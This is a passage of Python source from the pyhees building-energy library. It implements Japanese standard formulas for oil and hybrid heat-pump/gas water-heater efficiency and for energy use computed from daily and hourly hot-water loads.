e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 洗面水栓の給湯使用時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_w = get_table_d_3()[0][2]
b_std_w = get_table_d_3()[1][2]
c_std_w = get_table_d_3()[2][2]
a_w = a_std_w * f_hs # (7a)
b_w = b_std_w * f_hs # (7b)
c_w = c_std_w * f_hs # (7c)
e_w = a_w * theta_ex_d_Ave_d + b_w * (L_dashdash_k_d + L_dashdash_w_d) + c_w
return np.clip(e_w, 0.0, 1.0)
def get_e_b1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b1_d):
"""浴槽水栓湯はり時における日平均給湯機効率 (6d)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_b1_d(ndarray): 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽水栓湯はり時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_b1 = get_table_d_3()[0][3]
b_std_b1 = get_table_d_3()[1][3]
c_std_b1 = get_table_d_3()[2][3]
a_b1 = a_std_b1 * f_hs # (7a)
b_b1 = b_std_b1 * f_hs # (7b)
c_b1 = c_std_b1 * f_hs # (7c)
e_b1 = a_b1 * theta_ex_d_Ave_d + b_b1 * L_dashdash_b1_d + c_b1
return np.clip(e_b1, 0.0, 1.0)
def get_e_b2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b2_d):
"""浴槽自動湯はり時における日平均給湯機効率 (6e)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽自動湯はり時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽自動湯はり時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_b2 = get_table_d_3()[0][4]
b_std_b2 = get_table_d_3()[1][4]
c_std_b2 = get_table_d_3()[2][4]
a_b2 = a_std_b2 * f_hs # (7a)
b_b2 = b_std_b2 * f_hs # (7b)
c_b2 = c_std_b2 * f_hs # (7c)
e_b2 = a_b2 * theta_ex_d_Ave_d + b_b2 * L_dashdash_b2_d + c_b2
return np.clip(e_b2, 0.0, 1.0)
def get_e_ba1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba1_d):
"""浴槽水さし時における日平均給湯機効率 (6f)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba1_d(ndarray): 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽水さし時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_ba1 = get_table_d_3()[0][5]
b_std_ba1 = get_table_d_3()[1][5]
c_std_ba1 = get_table_d_3()[2][5]
a_ba1 = a_std_ba1 * f_hs # (7a)
b_ba1 = b_std_ba1 * f_hs # (7b)
c_ba1 = c_std_ba1 * f_hs # (7c)
e_ba1 = a_ba1 * theta_ex_d_Ave_d + b_ba1 * L_dashdash_ba1_d + c_ba1
return np.clip(e_ba1, 0.0, 1.0)
def get_e_ba2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba2_d):
"""浴槽追焚時における日平均給湯機効率 (6g)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽追焚時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_ba2 = get_table_d_3()[0][6]
b_std_ba2 = get_table_d_3()[1][6]
c_std_ba2 = get_table_d_3()[2][6]
a_ba2 = a_std_ba2 * f_hs # (7a)
b_ba2 = b_std_ba2 * f_hs # (7b)
c_ba2 = c_std_ba2 * f_hs # (7c)
e_ba2 = a_ba2 * theta_ex_d_Ave_d + b_ba2 * L_dashdash_ba2_d + c_ba2
return np.clip(e_ba2, 0.0, 1.0)
def get_table_d_3():
"""表 D.3 石油給湯機効率の回帰係
Args:
Returns:
list: 石油給湯機効率の回帰係
"""
table_d_3 = [
(0.0005, 0.0024, 0.0005, 0.0000, 0.0000, 0.0000, 0.0062),
(0.0028, 0.0021, 0.0028, -0.0027, -0.0024, -0.0027, 0.0462),
(0.6818, 0.7560, 0.6818, 0.9026, 0.8885, 0.9026, 0.4001)
]
return table_d_3
def get_f_hs(e_rtd):
"""当該給湯機に対する効率の補正係数 (8)
Args:
e_rtd(float): 当該給湯機の効率
Returns:
float: 当該給湯機に対する効率の補正係数
"""
return (0.8669 * e_rtd + 0.091) / 0.796
def get_e_rtd_default(hw_type):
"""当該給湯機の効率
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
Returns:
float: 当該給湯機の効率
"""
if hw_type in ['石油潜熱回収型給湯機', '石油潜熱回収型給湯温水暖房機']:
return 0.819
elif hw_type in ['石油従来型給湯機', '石油従来型給湯温水暖房機']:
return 0.779
else:
raise ValueError(hw_type)
def get_e_rtd(e_dash_rtd):
"""「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)
# に定義される「エネルギー消費効率」 から 当該給湯器の効率を取得
Args:
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
Returns:
float: 換算された当該給湯器の効率
"""
return e_dash_rtd - 0.081
# ============================================================================
# D.5 1日当たりの太陽熱補正給湯熱負荷
# ============================================================================
def get_L_dashdash_k_d(L_dashdash_k_d_t):
"""1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
"""
return np.sum(L_dashdash_k_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_s_d(L_dashdash_s_d_t):
"""1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_s_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_w_d(L_dashdash_w_d_t):
"""1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_w_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b1_d(L_dashdash_b1_d_t):
"""1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b2_d(L_dashdash_b2_d_t):
"""1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b2_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba1_d(L_dashdash_ba1_d_t):
"""1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba2_d(L_dashdash_ba2_d_t):
"""1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba2_d_t.reshape((365, 24)), axis=1)
def get_W_dash_b2_d(W_dash_b2_d_t):
"""1日当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Args:
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における節湯補正給湯量 (L/h)
"""
return np.sum(W_dash_b2_d_t.reshape(365, 24), axis=1)
```
#### File: src/pyhees/section7_1_i.py
```python
import numpy as np
# ============================================================================
# I.2 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b2_d_t,
L_dashdash_ba2_d_t):
"""# 1時間当たりの給湯機の消費電力量 (1)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (kWh/h)
"""
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
E_E_hs_d = calc_E_E_hs_d(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d,
L_dashdash_b2_d, L_dashdash_ba2_d)
# 1日当たりの太陽熱補正給湯熱負荷、給湯機の消費電力量の配列要素を1時間ごとに引き延ばす(合計値は24倍になることに注意)
E_E_hs_d = np.repeat(E_E_hs_d, 24)
L_dashdash_k_d = np.repeat(L_dashdash_k_d, 24)
L_dashdash_s_d = np.repeat(L_dashdash_s_d, 24)
L_dashdash_w_d = np.repeat(L_dashdash_w_d, 24)
L_dashdash_b2_d = np.repeat(L_dashdash_b2_d, 24)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
E_E_hs_d_t = np.zeros(24 * 365)
# (1-1) 太陽熱補正給湯熱負荷が発生しない日 => 24時間で単純分割
f1 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d == 0)
E_E_hs_d_t[f1] = E_E_hs_d[f1] / 24
# (1-2) 太陽熱補正給湯熱負荷が発生する日 => 負荷で按分
f2 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d > 0)
E_E_hs_d_t[f2] = E_E_hs_d[f2] * (
L_dashdash_k_d_t[f2] + L_dashdash_s_d_t[f2] + L_dashdash_w_d_t[f2] + L_dashdash_b2_d_t[f2] +
L_dashdash_ba2_d_t[f2]) / (
L_dashdash_k_d[f2] + L_dashdash_s_d[f2] + L_dashdash_w_d[f2] + L_dashdash_b2_d[f2] +
L_dashdash_ba2_d[f2])
return E_E_hs_d_t
def calc_E_E_hs_d(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d,
L_dashdash_b2_d,
L_dashdash_ba2_d):
"""# 1日当たりの給湯機の消費電力量 (2)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの給湯機の消費電力量 (kWh/d)
"""
# 係数
a_1, a_2, a_3, a_4 = get_coeff_a(L_HWH, hybrid_category)
# デフロスト係数
C_E_def_d = get_C_E_def_d(theta_ex_d_Ave_d)
E_E_hs_d = ((a_1 * theta_ex_d_Ave_d + a_2 * (
L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d) + a_3 * L_HWH + a_4) * C_E_def_d
+ (0.01723 * L_dashdash_ba2_d + 0.06099)) * 10 ** 3 / 3600
return E_E_hs_d
def get_coeff_a(L_HWH, hybrid_category):
"""# 係数a_1, a_2, a_3, a_4
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Returns:
tuple: 係数a_1, a_2, a_3, a_4
"""
a_1 = np.zeros(365)
a_2 = np.zeros(365)
a_3 = np.zeros(365)
a_4 = np.zeros(365)
if hybrid_category == '区分1':
a_1[L_HWH > 0] = get_table_i_3()[0][0]
a_1[L_HWH == 0] = get_table_i_3()[0][2]
a_2[L_HWH > 0] = get_table_i_3()[1][0]
a_2[L_HWH == 0] = get_table_i_3()[1][2]
a_3[L_HWH > 0] = get_table_i_3()[2][0]
a_3[L_HWH == 0] = get_table_i_3()[2][2]
a_4[L_HWH > 0] = get_table_i_3()[3][0]
a_4[L_HWH == 0] = get_table_i_3()[3][2]
elif hybrid_category == '区分2':
a_1[L_HWH > 0] = get_table_i_3()[0][1]
a_1[L_HWH == 0] = get_table_i_3()[0][3]
a_2[L_HWH > 0] = get_table_i_3()[1][1]
a_2[L_HWH == 0] = get_table_i_3()[1][3]
a_3[L_HWH > 0] = get_table_i_3()[2][1]
a_3[L_HWH == 0] = get_table_i_3()[2][3]
a_4[L_HWH > 0] = get_table_i_3()[3][1]
a_4[L_HWH == 0] = get_table_i_3()[3][3]
else:
raise ValueError(hybrid_category)
return a_1, a_2, a_3, a_4
def get_table_i_3():
"""表I.3 式(1)における係数
Args:
Returns:
list: 表I.3 式(1)における係数
"""
# 表I.3 式(1)における係数
table_i_3 = [
(-0.51375, -0.57722, -0.18114, -0.30429),
(-0.01782, 0.03865, 0.10483, 0.08497),
(0.27640, 0.18173, 0.0, 0.0),
(9.40671, 15.30711, 5.85285, 10.66158)
]
return table_i_3
def get_C_E_def_d(theta_ex_d_Ave_d):
"""1日当たりのデフロスト運転による消費電力量の補正係数 (3)
Args:
theta_ex_d_Ave_d: 日平均外気温度 (℃)
Returns:
ndarray: 1日当たりのデフロスト運転による消費電力量の補正係数 (3)
"""
C_E_def_d = np.ones(365)
f = theta_ex_d_Ave_d < 7
C_E_def_d[f] = 1 + (7 - theta_ex_d_Ave_d[f]) * 0.0091
return C_E_def_d
# ============================================================================
# I.3 ガス消費量
# ============================================================================
def calc_E_G_hs_d_t(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t, L_dashdash_b2_d_t,
L_dashdash_ba2_d_t):
"""# 1時間当たりの給湯機のガス消費量 (4)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Theta_ex_Nave: 夜間平均外気温 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/hd)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/hd)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
Theta_ex_Ave: returns: 1時間当たりの給湯機のガス消費量 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機のガス消費量 (MJ/h)
"""
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
# 1日当たりの給湯機のガス消費量 (5)
E_G_hs_d = calc_E_G_hs_d(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d, L_dashdash_b2_d,
L_dashdash_ba2_d)
# 1日当たりの太陽熱補正給湯熱負荷、給湯機のガス消費量の配列要素を1時間ごとに引き延ばす(合計値は24倍になることに注意)
E_G_hs_d = np.repeat(E_G_hs_d, 24)
L_dashdash_k_d = np.repeat(L_dashdash_k_d, 24)
L_dashdash_s_d = np.repeat(L_dashdash_s_d, 24)
L_dashdash_w_d = np.repeat(L_dashdash_w_d, 24)
L_dashdash_b2_d = np.repeat(L_dashdash_b2_d, 24)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
E_G_hs_d_t = np.zeros(24 * 365)
# (4-1) 太陽熱補正給湯熱負荷が発生しない日 => 24時間で単純分割
f1 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d == 0)
E_G_hs_d_t[f1] = E_G_hs_d[f1] / 24
# (4-2) 太陽熱補正給湯熱負荷が発生する日 => 負荷で按分
f2 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d > 0)
E_G_hs_d_t[f2] = E_G_hs_d[f2] * (
L_dashdash_k_d_t[f2] + L_dashdash_s_d_t[f2] + L_dashdash_w_d_t[f2] + L_dashdash_b2_d_t[f2] +
L_dashdash_ba2_d_t[f2]) / (
L_dashdash_k_d[f2] + L_dashdash_s_d[f2] + L_dashdash_w_d[f2] + L_dashdash_b2_d[f2] +
L_dashdash_ba2_d[f2])
return E_G_hs_d_t
def calc_E_G_hs_d(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d, L_dashdash_b2_d,
L_dashdash_ba2_d):
"""# 1日当たりの給湯機のガス消費量 (5)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Theta_ex_Ave(ndarray): 夜間平均外気温 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における節湯補正給湯熱負荷 (MJ/d)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/d)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/d)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの給湯機のガス消費量 (MJ/d)
"""
# 係数
b_1, b_2, b_3, b_4 = get_coeff_b(L_HWH, hybrid_category)
# デフロスト係数
C_G_def_d = get_C_G_def_d(Theta_ex_Ave)
# 浴槽追焚時における日平均給湯機効率
e_ba2 = get_e_ba2_d(Theta_ex_Ave, L_dashdash_ba2_d)
return ((b_1 * Theta_ex_Ave + b_2 * (
L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d) + b_3 * L_HWH + b_4) * C_G_def_d + (
L_dashdash_ba2_d / e_ba2))
def get_coeff_b(L_HWH, hybrid_category):
"""# 係数b_1, b_2, b_3, b_4
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Returns:
tuple: 係数b_1, b_2, b_3, b_4
"""
b_1 = np.zeros(365)
b_2 = np.zeros(365)
b_3 = np.zeros(365)
b_4 = np.zeros(365)
if hybrid_category == '区分1':
b_1[L_HWH > 0] = get_table_i_4()[0][0]
b_1[L_HWH == 0] = get_table_i_4()[0][2]
b_2[L_HWH > 0] = get_table_i_4()[1][0]
b_2[L_HWH == 0] = get_table_i_4()[1][2]
b_3[L_HWH > 0] = get_table_i_4()[2][0]
b_3[L_HWH == 0] = get_table_i_4()[2][2]
b_4[L_HWH > 0] = get_table_i_4()[3][0]
b_4[L_HWH == 0] = get_table_i_4()[3][2]
elif hybrid_category == '区分2':
b_1[L_HWH > 0] = get_table_i_4()[0][1]
b_1[L_HWH == 0] = get_table_i_4()[0][3]
b_2[L_HWH > 0] = get_table_i_4()[1][1]
b_2[L_HWH == 0] = get_table_i_4()[1][3]
b_3[L_HWH > 0] = get_table_i_4()[2][1]
b_3[L_HWH == 0] = get_table_i_4()[2][3]
b_4[L_HWH > 0] = get_table_i_4()[3][1]
b_4[L_HWH == 0] = get_table_i_4()[3][3]
else:
raise ValueError(hybrid_category)
return b_1, b_2, b_3, b_4
def get_table_i_4():
"""表I.4 係数
Args:
Returns:
list: 表I.4 係数
"""
# 表I.4 係数
table_i_4 = [
(-0.19841, -0.5782, -0.05770, 0.14061),
(1.10632, 0.75066, 0.47525, 0.3227),
(0.19307, 0.46244, 0.0, 0.0),
(-10.36669, -12.55999, -6.34593, -13.43567)
]
return table_i_4
def get_e_ba2_d(theta_ex_d_Ave_d, L_dashdash_ba2_d):
"""# 浴槽追焚時における日平均給湯機効率 (6)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Returns:
ndarray: 浴槽追焚時における日平均給湯機効率 (6)
"""
# 係数
c_1, c_2, c_3 = get_coeff_c()
e_ba2_d = c_1 * theta_ex_d_Ave_d + c_2 * L_dashdash_ba2_d + c_3
# 効率が1.0を超えない範囲で
e_ba2_d = np.clip(e_ba2_d, None, 1)
return e_ba2_d
def get_coeff_c():
"""表I.5 係数
Args:
Returns:
tuple: 表I.5 係数
"""
# 表I.5 係数
table_i_5 = (0.0048, 0.0060, 0.7544)
return table_i_5
def get_C_G_def_d(theta_ex_d_Ave_d):
"""# 1日当たりのデフロスト運転によるガス消費量の補正係数 (7)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 1日当たりのデフロスト運転によるガス消費量の補正係数 (7)
"""
C_G_def = np.ones(365)
f = theta_ex_d_Ave_d < 7
C_G_def[f] = 1 + (7 - theta_ex_d_Ave_d[f]) * 0.0205
return C_G_def
# ============================================================================
# I.4 灯油消費量
# ============================================================================
def get_E_K_hs_d_t():
"""# 1時間当たりの給湯機の灯油消費量
Args:
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量
"""
# 1日当たりの給湯機の灯油消費量は0とする
return np.zeros(24*365)
# ============================================================================
# I.5 温水暖房における熱源機の往き温水温度の候補
# ============================================================================
def get_hotwater_temp_list():
"""# 温水暖房における熱源機の往き温水温度の候補
Args:
Returns:
温水暖房における熱源機の往き温水温度の候補
"""
return [60, 40]
def get_L_dashdash_k_d(L_dashdash_k_d_t):
"""# 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
"""
return np.sum(L_dashdash_k_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_s_d(L_dashdash_s_d_t):
"""# 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_s_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_w_d(L_dashdash_w_d_t):
"""# 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_w_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b1_d(L_dashdash_b1_d_t):
"""# 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b1_d_t: 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b2_d(L_dashdash_b2_d_t):
"""# 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b2_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba1_d(L_dashdash_ba1_d_t):
"""# 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba2_d(L_dashdash_ba2_d_t):
"""# 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba2_d_t.reshape((365, 24)), axis=1)
```
#### File: src/pyhees/section7_1.py
```python
import numpy as np
from functools import lru_cache
import pyhees.section7_1_b as default
import pyhees.section7_1_c as gas
import pyhees.section7_1_d as oil
import pyhees.section7_1_e as eheatpump
import pyhees.section7_1_f as eheater
import pyhees.section7_1_g as hybrid_gas
import pyhees.section7_1_g_3 as hybrid_gas_3
import pyhees.section7_1_h as gas_hybrid
import pyhees.section7_1_i as whybrid
import pyhees.section7_1_j as watersaving
import pyhees.section7_1_m as schedule
import pyhees.section9_2 as lss
import pyhees.section9_3 as ass
from pyhees.section11_1 import load_outdoor, get_Theta_ex
from pyhees.section11_2 import load_solrad
from pyhees.section11_3 import load_schedule, get_schedule_hw
# ============================================================================
# 5. 給湯設備によるエネルギー消費量
# ============================================================================
# ============================================================================
# 5.1 消費電力量
# ============================================================================
@lru_cache()
